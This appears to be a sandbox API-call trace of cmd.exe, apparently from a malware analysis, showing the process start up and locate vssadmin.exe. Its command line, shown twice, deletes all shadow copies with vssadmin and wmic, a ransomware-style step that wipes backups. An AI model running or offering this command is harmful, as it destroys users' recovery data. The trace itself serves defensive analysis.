lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.964] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0149.964] RegCloseKey (hKey=0x94) returned 0x0 [0149.964] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0149.964] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0149.964] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.964] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0149.964] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.964] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.964] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.964] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0149.964] RegCloseKey (hKey=0x94) returned 0x0 [0149.964] time (in: timer=0x0 | out: timer=0x0) returned 0x620b74af [0149.964] srand (_Seed=0x620b74af) [0149.964] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin delete shadows /all /quiet && wmic shadowcopy delete" [0149.964] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin delete shadows /all /quiet && wmic shadowcopy delete" [0149.964] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0149.965] GetProcessHeap () returned 0x6e0000 [0149.965] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x210) returned 0x6e9bd0 [0149.965] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6e9bd8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0149.965] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0149.965] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0149.965] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.965] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0149.965] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0149.965] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0149.965] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0149.965] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0149.965] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0149.965] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0149.965] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0149.965] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0149.965] GetProcessHeap () returned 0x6e0000 [0149.966] RtlFreeHeap (HeapHandle=0x6e0000, Flags=0x0, BaseAddress=0x6e8780) returned 1 [0149.966] GetEnvironmentStringsW () returned 0x6e7d58* [0149.966] GetProcessHeap () returned 0x6e0000 [0149.966] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xa32) returned 0x6ea828 [0149.966] FreeEnvironmentStringsA (penv="A") returned 1 [0149.966] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0149.966] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.966] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0149.966] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0149.966] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0149.966] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0149.966] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0149.966] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0149.967] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0149.967] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0149.967] GetProcessHeap () returned 0x6e0000 [0149.967] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x44) returned 0x6e05c8 [0149.967] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0149.967] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0149.967] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0149.967] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6e0618 [0149.967] FindClose (in: hFindFile=0x6e0618 | out: hFindFile=0x6e0618) returned 1 [0149.967] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x6e0618 [0149.967] FindClose (in: hFindFile=0x6e0618 | out: hFindFile=0x6e0618) returned 1 [0149.968] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0149.968] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6e0618 [0149.968] FindClose (in: hFindFile=0x6e0618 | out: hFindFile=0x6e0618) returned 1 [0149.968] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0149.968] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0149.968] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0149.968] GetProcessHeap () returned 0x6e0000 [0149.969] RtlFreeHeap (HeapHandle=0x6e0000, Flags=0x0, BaseAddress=0x6ea828) returned 1 [0149.969] GetEnvironmentStringsW () returned 0x6e7d58* [0149.969] GetProcessHeap () returned 0x6e0000 [0149.969] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xa76) returned 0x6e9de8 [0149.969] FreeEnvironmentStringsA (penv="=") returned 1 [0149.969] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0149.969] GetProcessHeap () returned 0x6e0000 [0149.969] RtlFreeHeap (HeapHandle=0x6e0000, Flags=0x0, BaseAddress=0x6e05c8) returned 1 [0149.969] GetProcessHeap () returned 0x6e0000 [0149.969] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x400e) returned 0x6ebce8 [0149.970] GetProcessHeap () returned 0x6e0000 [0149.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x88) returned 0x6ea868 [0149.970] GetProcessHeap () returned 0x6e0000 [0149.970] RtlFreeHeap (HeapHandle=0x6e0000, Flags=0x0, BaseAddress=0x6ebce8) returned 1 [0149.970] GetConsoleOutputCP () returned 0x1b5 [0149.974] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0149.974] GetUserDefaultLCID () returned 0x409 [0149.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd334a0, cchData=8 | out: lpLCData=":") returned 2 [0149.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0149.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0149.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0149.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd334b0, cchData=8 | out: lpLCData="/") returned 2 [0149.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd33500, cchData=32 | out: lpLCData="Mon") returned 4 [0149.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd33540, cchData=32 | out: lpLCData="Tue") returned 4 [0149.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd33580, cchData=32 | out: lpLCData="Wed") returned 4 [0149.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd335c0, cchData=32 | out: lpLCData="Thu") returned 4 [0149.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd33600, cchData=32 | out: lpLCData="Fri") returned 4 [0149.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd33640, cchData=32 | out: lpLCData="Sat") returned 4 [0149.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd33680, cchData=32 | out: lpLCData="Sun") returned 4 [0149.975] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd334c0, cchData=8 | out: lpLCData=".") returned 2 [0149.975] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd334e0, cchData=8 | out: lpLCData=",") returned 2 [0149.975] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0149.976] GetProcessHeap () returned 0x6e0000 [0149.976] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20c) returned 0x6ea940 [0149.977] GetConsoleTitleW (in: lpConsoleTitle=0x6ea940, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0149.987] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0149.987] GetProcAddress (hModule=0x74f30000, lpProcName="CopyFileExW") returned 0x74f4ffc0 [0149.987] GetProcAddress (hModule=0x74f30000, lpProcName="IsDebuggerPresent") returned 0x74f4b0b0 [0149.987] GetProcAddress (hModule=0x74f30000, lpProcName="SetConsoleInputExeNameW") returned 0x76beb440 [0149.988] GetProcessHeap () returned 0x6e0000 [0149.988] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x400a) returned 0x6ebce8 [0149.988] GetProcessHeap () returned 0x6e0000 [0149.988] RtlFreeHeap (HeapHandle=0x6e0000, Flags=0x0, BaseAddress=0x6ebce8) returned 1 [0149.989] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0149.989] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0149.989] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0149.989] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0149.989] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0149.989] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0149.989] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0149.989] GetProcessHeap () returned 0x6e0000 [0149.989] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x58) returned 0x6eab58 [0149.989] GetProcessHeap () returned 0x6e0000 [0149.989] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1a) returned 0x6e0578 [0149.990] GetProcessHeap () returned 0x6e0000 [0149.990] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x42) returned 0x6eabb8 [0149.990] GetProcessHeap () returned 0x6e0000 [0149.990] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x58) returned 0x6eac08 [0149.991] _wcsicmp (_String1="FOR", _String2="wmic") returned -17 [0149.991] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17 [0149.991] _wcsicmp (_String1="IF", _String2="wmic") returned -14 [0149.991] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14 [0149.991] _wcsicmp (_String1="REM", _String2="wmic") returned -5 [0149.991] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5 [0149.991] GetProcessHeap () returned 0x6e0000 [0149.991] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x58) returned 0x6eac68 [0149.991] GetProcessHeap () returned 0x6e0000 [0149.991] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x12) returned 0x6e7540 [0149.991] GetProcessHeap () returned 0x6e0000 [0149.991] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x2e) returned 0x6eacc8 [0149.992] GetConsoleTitleW (in: lpConsoleTitle=0x19fa10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0149.993] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0149.993] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0149.993] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0149.993] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0149.993] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0149.993] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0149.993] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0149.993] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0149.993] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0149.993] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0149.993] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0149.993] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0149.993] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0149.993] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0149.993] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0149.993] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0149.993] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0149.993] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0149.993] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0149.994] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0149.994] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0149.994] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0149.994] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0149.994] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0149.994] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0149.994] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0149.994] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0149.994] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0149.994] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0149.994] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0149.994] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0149.994] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0149.994] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0149.994] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0149.994] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0149.994] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0149.994] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0149.994] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0149.994] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0149.994] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0149.994] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0149.994] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0149.994] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0149.994] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0149.994] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0149.994] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0149.994] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0149.994] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0149.994] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0149.994] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0149.994] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0149.994] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0149.994] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0149.994] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0149.995] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0149.995] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0149.995] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0149.995] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0149.995] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0149.995] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0149.995] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0149.995] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0149.995] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0149.995] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0149.995] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0149.995] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0149.995] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0149.995] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0149.995] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0149.995] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0149.995] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0149.995] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0149.995] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0149.995] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0149.995] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0149.995] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0149.995] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0149.995] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0149.995] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0149.995] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0149.996] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0149.996] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0149.996] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0149.996] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0149.996] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0149.996] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0149.996] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0149.996] GetProcessHeap () returned 0x6e0000 [0149.996] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x210) returned 0x6ead00 [0149.996] GetProcessHeap () returned 0x6e0000 [0149.996] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x54) returned 0x6eaf18 [0149.996] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0149.996] GetProcessHeap () returned 0x6e0000 [0149.997] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x418) returned 0x6e05c8 [0149.997] SetErrorMode (uMode=0x0) returned 0x0 [0149.997] SetErrorMode (uMode=0x1) returned 0x0 [0149.997] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6e05d0, lpFilePart=0x19f51c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f51c*="Desktop") returned 0x1d [0149.997] SetErrorMode (uMode=0x0) returned 0x1 [0149.997] GetProcessHeap () returned 0x6e0000 [0149.997] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x6e05c8, Size=0x56) returned 0x6e05c8 [0149.997] GetProcessHeap () returned 0x6e0000 [0149.997] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x6e05c8) returned 0x56 [0149.997] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0149.997] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0149.997] GetProcessHeap () returned 0x6e0000 [0149.997] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x110) returned 0x6eaf78 [0149.997] GetProcessHeap () returned 0x6e0000 [0149.997] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x218) returned 0x6e0628 [0150.004] GetProcessHeap () returned 0x6e0000 [0150.004] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x6e0628, Size=0x112) returned 0x6e0628 [0150.004] GetProcessHeap () returned 0x6e0000 [0150.004] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x6e0628) returned 0x112 [0150.004] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0150.004] GetProcessHeap () returned 0x6e0000 [0150.004] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xe0) returned 0x6eb090 [0150.005] GetProcessHeap () returned 0x6e0000 [0150.005] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x6eb090, Size=0x76) returned 0x6eb090 [0150.005] GetProcessHeap () returned 0x6e0000 [0150.005] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x6eb090) returned 0x76 [0150.006] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.006] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0xffffffff [0150.007] GetLastError () returned 0x2 [0150.007] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.007] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0x6eb110 [0150.007] GetProcessHeap () returned 0x6e0000 [0150.007] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6e77e0 [0150.007] FindClose (in: hFindFile=0x6eb110 | out: hFindFile=0x6eb110) returned 1 [0150.007] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0xffffffff [0150.008] GetLastError () returned 0x2 [0150.008] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0x6eb110 [0150.008] GetProcessHeap () returned 0x6e0000 [0150.008] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x6e77e0, Size=0x4) returned 0x6eb150 [0150.008] FindClose (in: hFindFile=0x6eb110 | out: hFindFile=0x6eb110) returned 1 [0150.008] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0150.008] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0150.008] GetConsoleTitleW (in: lpConsoleTitle=0x19f79c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0150.009] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f6c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f6ac | out: lpAttributeList=0x19f6c8, lpSize=0x19f6ac) returned 1 [0150.009] UpdateProcThreadAttribute (in: lpAttributeList=0x19f6c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f6b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f6c8, lpPreviousValue=0x0) returned 1 [0150.009] GetStartupInfoW (in: lpStartupInfo=0x19f700 | out: lpStartupInfo=0x19f700*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0150.009] GetProcessHeap () returned 0x6e0000 